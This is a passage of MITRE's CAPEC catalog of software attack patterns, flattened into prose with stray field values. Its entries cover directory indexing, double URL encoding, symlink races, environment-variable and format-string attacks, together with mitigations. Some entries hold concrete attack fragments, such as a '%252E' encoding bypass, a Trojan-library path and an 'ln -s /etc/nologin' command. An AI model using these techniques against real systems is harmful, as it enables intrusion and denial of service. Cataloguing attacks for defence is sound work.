An attacker probes the target in a manner that is designed to solicit information relevant to system security. This is achieved by sending data that is syntactically invalid or non-standard relative to a given service, protocol, or expected-input, or by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target. As a result the attacker is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Some exchanges with the target may trigger unhandled exceptions or verbose error messages. When this happens error messages may reveal information like stack traces, configuration information, path information, or database messages. This type of attack also includes manipulation of query strings in a URI, such as by attempting to produce invalid SQL queries or by trying alternative path values, in the hope that the server will return useful information. This attack differs from Data Interception and other data collection attacks in that the attacker actively queries the target rather than simply watching for the target to reveal information.
Verbose error handling routines or components that provide the user feedback related to system or application properties.
Medium
A web browser or a client application capable of sending custom protocol messages, such as a MITM Proxy or a fuzzer, or a similar scanner or packet injection tool.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker monitors data streams to or from a target in order to gather information. This attack may be undertaken to gather information to support a later attack or the data collected may be the end goal of the attack. This attack usually involves sniffing network traffic, but may include observing other types of data streams, such as radio. In most varieties of this attack, the attacker is passive and simply observes regular communication, however in some variants the attacker may attempt to initiate the establishment of a data stream or influence the nature of the data transmitted. However, in all variants of this attack, and distinguishing this attack from other data collection methods, the attacker is not the intended recipient of the data stream. Unlike some other data leakage attacks, the attacker is observing explicit data channels (e.g. network traffic) and reading the content. This differs from attacks that collect more qualitative information, such as communication volume, or other information not explicitly communicated via a data stream.
All targets that transmit information over a network is potentially vulnerable to this attack.
Medium
The attacker must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change.
311
Targeted
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers aware that more data is being fed into a multicast or public information distribution means can 'select' information bound only for another client, even if the distribution means itself forces users to authenticate in order to connect initially.
Doing so allows the attacker to gain access to possibly privileged information, possibly perpetrate other attacks through the distribution means by impersonation.
If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could change its identifier from a less privileged to more so privileged channel or command.
Determine the nature of messages being transported as well as the identifiers to be used as part of the attack
If required, authenticate to the distribution channel
If any particular client's information is available through the transport means simply by selecting a particular identifier, an attacker can simply provide that particular identifier.
Attackers with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.
Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.
Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves.
High
Very High
A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single "Partners" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack.
Low
All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages.
The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means.
Assisted protocol analysis: because the protocol under attack is a public channel, or one in which the attacker likely has authorized access to, they need simply to decode the aspect of channel or message interpretation that codes for message identifiers.
Probing is as simple as changing this value and watching its effect.
Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.
The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.
Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
201
Targeted
306
Secondary
1000
Attack Pattern
PeerOf
21
1000
Attack Pattern
ChildOf
216
Complete Mediation
Use Authentication Mechanisms, Where Appropriate, Correctly
Use Authorization Mechanisms Correctly: this refers to Ambiguity of authentication. Many authorization systems use ambiguous symbols (i.e., principal names) to identify principals allowing circumvention of authorization by using a different, though equivalent, principal name. For example, there are many implementations for restricting remote host access to local services that may allow many proper (but apparently different) names for unique hosts (e.g., fully qualified domain names, shortened names, CNAMEs, IPv4 addresses, IPv6 addresses).
Penetration
Medium
Low
Low
Client-Server
n-Tier
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. The may allow the attacker to bypass filters that attempt to detect illegal characters or strings, such as might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.
Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an attacker may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An attacker can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.
The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.
Medium
Tools that automate encoding of data can assist attackers in generating encoded strings.
1000
Attack Pattern
ChildOf
267
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a sample, demonstration, or test API that is insecure by default and should not be resident on production systems. Some applications include APIs that are intended to allow an administrator to test and refine their domain. These APIs should usually be disabled once a system enters a production environment. Testing APIs may expose a great deal of diagnostic information intended to aid an administrator, but which can also be used by an attacker to further refine their attack. Moreover, testing APIs may not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may have many flaws and vulnerabilities that would allow an attacker to severely disrupt a target.
The target must have installed test APIs and failed to secure or remove them when brought into a production environment.
High
For some APIs, the attacker will need that appropriate client application that interfaces with the API. Other APIs can be executed using simple tools, such as web browsers or console windows. In some cases, an attacker may need to be able to authenticate to the target before it can access the vulnerable APIs.
770
Targeted
1000
Attack Pattern
ChildOf
113
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.
The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.
The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources.
Medium
No special resources are required for this attack beyond the ability to access the target.
732
Targeted
602
Targeted
434
Targeted
1000
Category
ChildOf
232
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.
The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction.
Very High
High
1000
Category
ChildOf
255
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a data structure shared between multiple applications or an application pool to affect application behavior. Data may be shared between multiple applications or between multiple threads of a single application. Data sharing is usually accomplished through mutual access to a single memory location. If an attacker can manipulate this shared data (usually by co-opting one of the applications or threads) the other applications or threads using the shared data will often continue to trust the validity of the compromised shared data and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared data, or even cause a crash or compromise of the sharing applications.
The target applications (or target application threads) must share data between themselves.
The attacker must be able to manipulate some piece of the shared data either directly or indirectly and the other users of the data must accept the changed data as valid.
Medium
The attacker must be able to change the shared data. Usually this requires that the attacker be able to compromise one of the sharing applications or threads in order to manipulated the shared data.
682
Targeted
1000
Category
ChildOf
255
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow control in management of interactions. Since each request consumes some of the target's resources, if a sufficiently large number of requests must be processed at the same time then the target's resources can be exhausted.
The degree to which the attack is successful depends upon the volume of requests in relation to the amount of the resource the target has access to, and other mitigating circumstances such as the target's ability to shift load or acquired additional resources to deal with the depletion. The more protected the resource and the greater the quantity of it that must be consumed, the more resources the attacker may need to have at their disposal. A typical TCP/IP flooding attack is a Distributed Denial-of-Service attack where many machines simultaneously make a large number of requests to a target. Against a target with strong defenses and a large pool of resources, many tens of thousands of attacking machines may be required.
When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the attacker can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.
Any target that services requests is vulnerable to this attack on some level of scale.
Medium
A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests.
404
Targeted
770
Targeted
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \) and/or dots (.)) to reach desired directories or files.
The attacker must be able to control the path that is requested of the target.
The target must fail to adequately sanitize incoming paths
The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
Directory Discovery
Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.
Send requests to the web server for common directory names
env-Web
If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.
env-All
Search for uncommon or potentially user created directories that may be present.
env-Web
ACLs or other access control mechanisms are present in the application or server configuration that indicate the existence of the directory but the attacker lacks the proper authorization to access the directory (HTTP Status Code 401)
env-Web env-ClientServer
ACLs or other access control mechanisms are present in the application or server configuration that indicate the existence of the directory, but access is forbidden and authorization will not help. (HTTP Status Code 403)
env-Web env-ClientServer
The directory exists and can be accessed. HTTP Status Code 200 is the standard code for a successful request
env-Web
The directory may or may not exist because the server is redirecting the user to another location. HTTP Status codes 301 or 302 indicate the server configuration is redirecting the user to some other page or directory. It cannot be automatically assumed that the location to which the attacker is redirected is the requested directory located elsewhere.
env-Web
The adversary compiles a list of one or more directories that exist on the server. Some of these directories may not be immediately accessible but they are present.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Block access to the directory listing by setting access control in the .htaccess file.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Iteratively explore directory/file structures
The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods
Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.
env-Web
Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'.
env-Web
Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
env-Web
Sequentially request a list of common base files to each directory discovered.
env-Web
Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a "/" request
env-Web
There are no normal base files (index.html /home.html /default.html /default.asp /default.asp / index.php) at present
env-Web
"File not found" error messages along with invalid path name.
env-Web
The website automatically redirects to the base file. Note that the attacker may still be able to explore the directory listings.
env-Web
Error 403 Forbidden message displays. The access to directory indexing is blocked by the web server.
env-Web
A list of files within a requested directory.
A "File not found" error messages along with invalid path name.
The directory index page shows that there are some sub-directories or files available in the current directory
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Block access to the directory listing by setting access control in the .htaccess file.
Automatically redirects to the base file if the request has not given specific filename.
Read directories or files which are not intended for public viewing.
The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods
Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a "/" request
env-Web
Try other known exploits to elevate privileges sufficient to bypass protected directories.
env-All
List the files in the directory by issuing a request with the URL ending in a "/" slash.
env-Web
Access the files via direct URL and capture contents.
env-Web
Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
env-Web
Sequentially request a list of common base files to each directory discovered.
env-Web
A request for the directory name yields a directory listing
env-All
Either an application or server exploit yields a directory listing
env-All
Errors 401 or 403 indicate access to directory indexing is blocked by the web server and all methods tried have yielded no success to bypass the ACL or elevate the adversary's privileges.
env-All
Directory contents are accessible to the attacker.
Monitor server logs for unintended file or directory access.
Monitor errors (e.g., 404, 401, 403) from web servers, application servers and generate an alert on a disproportionate number of HTTP errors.
Identify platform and application-specific sensitive directories and generate logs and alerts for any requests to these resources. Setup ACLs as your operating system, application, and server permit. Consult your server or application documentation for the proper procedure.
Automatically redirect to the base file (such as index.html) for the requests without given specific file name.
Not allow access to the sensitive files (such as DB dump data) directly.
Monitor the volume of failed requests and either deny or redirect requests that appear to be generated by a bot, script, or some other form of scanning tool.
Obtain a list of sensitive areas that should not be directly accessible based on your application and server type. Use an external protection device such as a filtering proxy, packet scrubbing load balancer, etc., and frequently update the list of protected areas.
The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.
The adversary must be able to control the path that is requested of the target.
The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.
The server version or patch level must not inherently prevent known directory listing attacks from working.
Medium
High
Brute Force
API Abuse
In this example, the adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80
The target application does not have direct hyperlink to the "backup" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a "db_dump.php" file in it. This sensitive data should not be disclosed publicly.
Low
To issue the request to URL without given a specific file name
High
To bypass the access control of the directory of listings
Ability to send HTTP requests to a web application.
1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.
2. Preventing with .htaccess in Apache web server: In .htaccess, write "Options-indexes".
3. Suppressing error messages: using error 403 "Forbidden" message exactly like error 404 "Not Found" message.
Confidentiality
Read files or directories
Information Leakage
424
Targeted
425
Targeted
288
Targeted
285
Targeted
732
Targeted
276
Targeted
693
Targeted
721
Targeted
1000
Attack Pattern
ChildOf
116
All resources must be constrained to be inaccessible by default followed by selectively allowing access to resources as dictated by application and business logic
In addition to a central controller, every resource must also restrict, wherever possible, incoming accesses as dictated by the relevant ACL.
Failing Securely
Least Privilege
Reluctance To Trust
Complete Mediation
Use Authorization Mechanisms Correctly
Design Configuration Subsystems Correctly and Distribute Safe Default Configurations
Reconnaissance
Exploitation
Penetration
High
Low
Low
Client-Server
n-Tier
All
All
All
WASC Threat Classification 2.0
WASC-16 - Directory Indexing
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Directory-Indexing
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.
The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.
The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers.
Medium
No special resources are required.
682
Targeted
1000
Category
ChildOf
255
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack involves an attacker manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.
The target application must have a pointer variable that the attacker can influence to hold an arbitrary value.
Medium
No special resources are required for most forms of this attack.
682
Targeted
1000
Category
ChildOf
255
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
The attacker probes the application for information. Which version of the application is running? Are there known environment variables? etc.
The attacker gains control of an environment variable and ties to find out what process(es) the environment variable controls.
The attacker modifies the environment variable to abuse the normal flow of processes or to gain access to privileged resources.
An environment variable is accessible to the user.
An environment variable used by the application can be tainted with user supplied data.
Input data used in an environment variable is not validated properly.
The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attempt to manipulate that variable.
Very High
Very High
Injection
Modification of Resources
Protocol Manipulation
Environment variables
Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target.
As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\172.16.2.100\shared_files\trojan_dll.dll.
Path Manipulation (CVE-1999-0073)
Low
In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism.
Medium
High
Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.
An attacker can intentionally modify the client side parameter and monitor how the server behaves in response to that modification. For instance an attacker will look at the cookie data, the URL parameters, the hidden variables in forms, variables used in system calls, etc.
If the client uses a program in binary format to connect to the server, disassembler can be used to identify parameter within the binary code, and then the attacker would try to simulate the client application and change some of the parameters sent to the server. For instance the attacker may find that a secret key or a path is hard coded in the binary client application.
Environment variables are frequently stored in cleartext configuration files. If the attacker can modify those configuration files, he can control the environment variables. Even a read access can potentially be dangerous since this may give sensitive information to perform this type of attack. Indeed knowing which environment variables the application uses is a prerequisite to this type of attack.
The attacker may try to obfuscate its attempts to subvert the target process (such as authentication) by using valid values for the variable she controls. By using valid values the user tries to understand the authentication mechanism. This would be in preparation to a more serious attack.
Protect environment variables against unauthorized read and write access.
Protect the configuration files which contain environment variables against illegitimate read and write access.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.
Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Availability
Unexpected State
Confidentiality
Read application data
The client controlled parameter
The new value of the client controlled parameter.
The activation zone is the server side function where the client controlled parameter is consumed.
Consuming an attacker-controlled parameter can defeat the normal process of the application.
353
Targeted
285
Secondary
302
Targeted
74
Targeted
15
Targeted
73
Targeted
20
Secondary
200
Secondary
CVE-2006-4244
SQL-Ledger 2.4.4 through 2.6.17 authenticates users by verifying that the value of the sql-ledger-[username] cookie matches the value of the sessionid parameter, which allows remote attackers to gain access as any logged-in user by setting the cookie and the parameter to the same value.
CVE-2006-2734
enter.asp in Mini-Nuke 2.3 and earlier makes it easier for remote attackers to conduct password guessing attacks by setting the guvenlik parameter to the same value as the hidden gguvenlik parameter, which bypasses a verification step because the guvenlik parameter is assumed to be immutable by the attacker.
CVE-2006-2527
Admin/admin.php in phpBazar 2.1.0 and earlier allows remote attackers to bypass the authentication process and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1.
CVE-2006-1505
base_maintenance.php in Basic Analysis and Security Engine (BASE) before 1.2.4 (melissa), when running in standalone mode, allows remote attackers to bypass authentication, possibly by setting the standalone parameter to "yes".
1000
Attack Pattern
ChildOf
77
1000
Attack Pattern
CanPrecede
14
1000
Attack Pattern
PeerOf
10
1000
Attack Pattern
ChildOf
264
Reluctance to trust
Always perform wise data validation. Do not accept tainted data without validation. Do not simply base authentication on the client controlled parameter.
Avoid relying on client side validation only.
Penetration
Medium
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request. For example, using an Integer Attack, the attacker could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target.
The target must accept service requests from the attacker and the attacker must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the attacker to manipulate variables used in the allocation.
Medium
No special resources are required for this attack beyond the ability of the attacker to have the target service requests.
770
Targeted
404
Targeted
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the attacker determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the attacker. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor attacker who would be unable to flood the target can still utilize this attack.
Resource depletion through leak differs from resource depletion through allocation in that, in the former, the attacker may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.
The target must have a resource leak that the attacker can repeatedly trigger.
Medium
No special resources are required beyond the ability to trigger the targeted leak.
404
Targeted
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
Identify Target
Attacker identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.
The attacker writes to files in different directories to check whether the application has sufficient checking before file operations.
env-Local
The attacker creates symlinks to files in different directories.
env-Local
The application does not check whether the file is a symlink or not before writing data to it.
env-Local
The system allows creating symlinks.
env-Local
Some directories do not allow creating symlink.
env-Local
The application checks whether the file is a symlink or not before writing data to it.
env-Local
The application does not check whether the file is a symlink or not before writing data to it and the attacker can create symlinks to the files.
Perform checks on files to be handled: a) check for existence of file; b) check for symlinks; c) check for hard links.
Try to create symlinks to different files
The attacker then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.
The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using "sleep(2)" and "usleep()" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
env-Local
The attacker may need a little guesswork on the filenames on which the target application would operate.
env-Local
The attacker tries to create symlinks to the various filenames.
env-Local
The attacker can create symlinks to the files in the target directories.
env-Local
The attacker creates symlink to the files while the target application is operating on the file.
Perform checks on files to be handled for existence, symlinks or hard links.
Give the sensitive files restricted permissions.
Target application operates on created symlinks to sensitive files
The attacker is able to create symlinks to sensitive files while the target application is operating on the file.
Create the symlink to the sensitive file such as configuration files, etc.
env-Local
The attacker creates symlinks to sensitive files and the target application operates on them leading to a breach in the security assumptions of the target application.
Perform checks on files to be handled for existence, symlinks or hard links.
Give sensitive files restricted permissions.
Generate semi-random filenames and add the "O_CREAT|O_EXCL" flags to any "open()" calls made.
The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The attacker must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear.
High
Low
Spoofing
Analysis
Time and State
The attacker creates a symlink with the "same" name as the file which the application is intending to write to. The application will write to the file- "causing the data to be written where the symlink is pointing". An attack like this can be demonstrated as follows:
root# vulprog myFile
{...program does some processing...]
attacker# ln –s /etc/nologin myFile
[...program writes to 'myFile', which points to /etc/nologin...]
In the above example, the root user ran a program with poorly written file handling routines, providing the filename "myFile" to vulnprog for the relevant data to be written to. However, the attacker happened to be looking over the shoulder of "root" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.
Low
To create symlinks
High
To identify the files and create the symlinks during the file operation time window
No special resources are required beyond the ability to create the necessary symbolic link.
Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.
Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions.
Confidentiality
"Varies by context"
Information Leakage
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read memory
Integrity
Modify memory
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Availability
DoS: crash / exit / restart
DoS: instability
59
Targeted
1000
Attack Pattern
ChildOf
159
Exploitation
Penetration
High
High
High
Client-Server
All
All
Shaun Colley
Crafting Symlinks for Fun and Profit
http://www.infosecwriters.com/texts.php?op=display&id=159
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is blindly attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.
The attacker must be able to control the options or switches sent to the target.
Medium
No special resources are required beyond the ability to send requests to the target.
Design: Minimize switch and option functionality to only that necessary for correct function of the command.
Implementation: Remove all debug and testing options from production code.
559
Targeted
656
Secondary
88
Secondary
1000
Category
ChildOf
210
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol. Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to "share this site with a friend" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an attacker adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an attacker can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.
The target application must allow users to send email to some recipient, must allow the user to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.
Medium
No special resources are required beyond access to the target mail application.
1000
Attack Pattern
ChildOf
137
333
Category
HasMember
363
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An attacker can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the attacker can write to the program stack.
Survey application
The attacker takes an inventory of the entry points of the application.
Spider web sites for all available links
env-Web
List parameters, external variables, configuration files variables, etc. that are possibly used by the application.
env-All
At least one data input to application identified.
No inputs to application identified. Note that just because no inputs are identified does not mean that the application will not accept any.
Determine user-controllable input susceptible to format string injection
